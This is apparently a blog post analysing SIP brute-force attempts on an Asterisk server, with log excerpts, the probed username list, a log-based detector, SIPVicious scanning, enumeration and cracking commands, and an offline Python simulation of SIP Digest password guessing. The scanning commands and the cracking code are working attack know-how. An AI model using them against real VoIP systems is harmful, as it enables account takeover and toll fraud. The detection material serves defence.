
Unauthorized SIP registrations: 218.93.205.205

Published: 2010/04/16

They keep coming back, persistently.

  Registration from '"436599596"<sip:436599596@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"374192414"<sip:374192414@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"100"<sip:100@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"101"<sip:101@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"199"<sip:199@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"200"<sip:200@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"204"<sip:204@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"205"<sip:205@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"206"<sip:206@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"207"<sip:207@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"208"<sip:208@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"9994"<sip:9994@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9995"<sip:9995@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9996"<sip:9996@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9997"<sip:9997@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9998"<sip:9998@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
  Registration from '"9999"<sip:9999@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch 
 :
 :
 :
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
  Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password 
 inetnum:      218.90.0.0 - 218.94.255.255
 netname:      CHINANET-JS
 descr:        CHINANET jiangsu province network
 descr:        China Telecom
 descr:        A12,Xin-Jie-Kou-Wai Street
 descr:        Beijing 100088
 country:      CN

In terms of behaviour, it first checks whether each of the following usernames (phone numbers / extension numbers) exists:

 account 
 admin 
 administrator 
 alex 
 guest 
 mark 
 michael 
 test 
 test1 
 test12 
 test123 
 374192414 
 436599596 
 100 to 9999

For any username that does NOT produce

 Username/auth name mismatch

on the SIP server, the response differs, so the attacker concludes that the username exists and starts brute-forcing the password of that username.
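The two-phase pattern above (many distinct usernames rejected with "Username/auth name mismatch", then many "Wrong password" failures against one username) is easy to pick out of the Asterisk log. The following detector is an added example written for this page, not code from the original post or from Asterisk; the log lines embedded in it are constructed in the format shown above, and the thresholds (3 probed names, 3 failures on one name) are arbitrary assumptions. As a caveat for the defender: Asterisk's sip.conf option alwaysauthreject=yes makes the server reject unknown and known-but-wrong-password users identically, which removes the response difference the enumeration phase relies on.

```python
import re
from collections import defaultdict

# Constructed sample log lines in the Asterisk chan_sip format shown above
# (not a real capture; x.x.x.x stands for the local server address).
SAMPLE_LOG = """\
Registration from '"436599596"<sip:436599596@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch
Registration from '"100"<sip:100@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch
Registration from '"101"<sip:101@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch
Registration from '"200"<sip:200@x.x.x.x>' failed for '218.93.205.205' - Username/auth name mismatch
Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password
Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password
Registration from '"201" <sip:201@x.x.x.x>' failed for '218.93.205.205' - Wrong password
Registration from '"202" <sip:202@x.x.x.x>' failed for '10.0.0.50' - Wrong password
"""

# Matches both '"201"<sip:...>' and '"201" <sip:...>' (with or without a space).
# search() rather than match() so a timestamp/NOTICE prefix before the text is tolerated.
LINE_RE = re.compile(
    r"Registration from '\"(?P<user>[^\"]*)\"\s*<sip:[^>]*>' "
    r"failed for '(?P<src>[^']+)' - (?P<reason>.+)$"
)


def parse(lines):
    """Yield (username, source_ip, reason) for every line that parses."""
    for line in lines:
        m = LINE_RE.search(line.strip())
        if m:
            yield m.group("user"), m.group("src"), m.group("reason")


def summarize(lines):
    """Per source IP: the set of usernames rejected as non-existent, and
    a count of wrong-password failures per username."""
    probed = defaultdict(set)
    wrongpw = defaultdict(lambda: defaultdict(int))
    for user, src, reason in parse(lines):
        if reason == "Username/auth name mismatch":
            probed[src].add(user)
        elif reason == "Wrong password":
            wrongpw[src][user] += 1
    return probed, wrongpw


def classify(lines, enum_threshold=3, brute_threshold=3):
    """Label each source IP: enumeration, bruteforce, both, or benign.
    Thresholds are assumptions; tune them to the size of your PBX."""
    probed, wrongpw = summarize(lines)
    verdicts = {}
    for src in set(probed) | set(wrongpw):
        enumerating = len(probed[src]) >= enum_threshold
        targets = [u for u, n in wrongpw[src].items() if n >= brute_threshold]
        if enumerating and targets:
            verdicts[src] = ("enumeration+bruteforce", sorted(targets))
        elif enumerating:
            verdicts[src] = ("enumeration", sorted(probed[src]))
        elif targets:
            verdicts[src] = ("bruteforce", sorted(targets))
        else:
            verdicts[src] = ("benign", [])
    return verdicts


if __name__ == "__main__":
    for src, (verdict, names) in classify(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {verdict} {names}")
```

Run against `/var/log/asterisk/messages` the same regex doubles as a fail2ban failregex; fail2ban in fact ships an asterisk filter built around these same "Registration from ... failed for" lines, so in practice blocking the source after a handful of failures is a one-line jail configuration.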


So, what does this attack actually look like when it is carried out...

There are various related tools, such as SIPp and SIPVicious; for example, something like this.

Scan a given address range, or the Internet at large, for SIP servers:

 % ./svmap.py 10.0.0.1-10.0.0.255
 | SIP Device    | User Agent   | Fingerprint |
 ---------------------------------------------------- 
 | 10.0.0.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.0.2:5060 | Asterisk PBX | Asterisk    |
 | 10.0.1.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.2.1:5060 | Asterisk PBX | Asterisk    |
 | 10.0.2.2:5060 | Asterisk PBX | Asterisk    |

Find out which extensions exist on the SIP server found. In other words, the good old war dialer...

 % ./svwar.py 10.0.0.1
 | Extension | Authentication |
 ------------------------------
 | 201       | reqauth        |
 | 203       | reqauth        |
 | 202       | reqauth        |

Then crack the extensions found:

 % ./svcrack.py -u 201 -d dictionary.txt 10.0.0.1
 :
 :
 :
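What svwar and svcrack do under the hood is plain SIP: an unauthenticated REGISTER per candidate extension, a look at the reply's status code, and then, for extensions that were challenged, a REGISTER carrying an RFC 2617 Digest (MD5) Authorization header per dictionary word. The block below is an added illustration for this page, not SIPVicious code; nothing is sent on the wire, the realm, nonce, addresses and the "server" with its single known secret are all constructed stand-ins so the exchange can be traced offline.

```python
import hashlib
import uuid

# Constructed values; no packets are sent anywhere.
SERVER = "10.0.0.1"          # the PBX found by svmap in the text
CLIENT = "192.0.2.10"        # our constructed source address
REALM = "asterisk"           # constructed realm, as a 401 challenge would carry
NONCE = "5d3c2f1a"           # constructed nonce from that challenge
SECRET = {"201": "1234"}     # constructed PBX: one extension with a weak secret


def build_register(ext, server, cseq=1, auth=None):
    """Build a SIP REGISTER for extension `ext`. `auth` is an optional
    Authorization header value for the second, authenticated attempt."""
    lines = [
        f"REGISTER sip:{server} SIP/2.0",
        f"Via: SIP/2.0/UDP {CLIENT}:5060;branch=z9hG4bK{uuid.uuid4().hex[:10]};rport",
        f'From: "{ext}" <sip:{ext}@{server}>;tag={uuid.uuid4().hex[:8]}',
        f'To: "{ext}" <sip:{ext}@{server}>',
        f"Call-ID: {uuid.uuid4().hex}@{CLIENT}",
        f"CSeq: {cseq} REGISTER",
        f"Contact: <sip:{ext}@{CLIENT}:5060>",
        "Max-Forwards: 70",
        "Expires: 3600",
        "Content-Length: 0",
    ]
    if auth:
        lines.insert(-1, f"Authorization: {auth}")   # before Content-Length
    return "\r\n".join(lines) + "\r\n\r\n"


def digest_response(user, realm, password, method, uri, nonce):
    """RFC 2617 Digest response (MD5, no qop) as used by SIP REGISTER."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def classify_status(status_line):
    """What the enumeration step infers from the first reply to an
    unauthenticated REGISTER (the 'Authentication' column of svwar)."""
    code = int(status_line.split()[1])
    if code in (401, 407):
        return "reqauth"   # the server challenged us: the extension exists
    if code == 200:
        return "noauth"    # registered with no password at all
    if code in (403, 404):
        return "absent"    # only distinguishable while the server leaks existence
    return "unknown"


def server_accepts(ext, response):
    """Constructed PBX check: recompute the digest with the real secret."""
    expected = digest_response(ext, REALM, SECRET.get(ext, ""),
                               "REGISTER", f"sip:{SERVER}", NONCE)
    return ext in SECRET and response == expected


def dictionary_attack(ext, candidates):
    """One svcrack-style pass: a digest per candidate password, each sent in a
    fresh REGISTER; here the network send is replaced by server_accepts()."""
    for pw in candidates:
        resp = digest_response(ext, REALM, pw, "REGISTER", f"sip:{SERVER}", NONCE)
        auth = (f'Digest username="{ext}", realm="{REALM}", nonce="{NONCE}", '
                f'uri="sip:{SERVER}", response="{resp}", algorithm=MD5')
        msg = build_register(ext, SERVER, cseq=2, auth=auth)
        if server_accepts(ext, resp):
            return pw, msg
    return None, None


if __name__ == "__main__":
    print(classify_status("SIP/2.0 401 Unauthorized"))
    pw, msg = dictionary_attack("201", ["0000", "1111", "1234"])
    print("recovered:", pw)
    print(msg)
```

Two things follow directly from the code: the enumeration step is only possible because "absent" and "reqauth" are different replies, which is exactly the response difference the log above betrays, and every guess in the cracking step costs the attacker one REGISTER, so a four-digit secret on extension 201 falls to a dictionary pass in seconds.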

And that's the pattern: only the target application changes; what is actually being done is simple and the same in every era.

And this whole sequence of steps is being run as an automated scenario.

[Category: IP telephony observation diary]

by jyake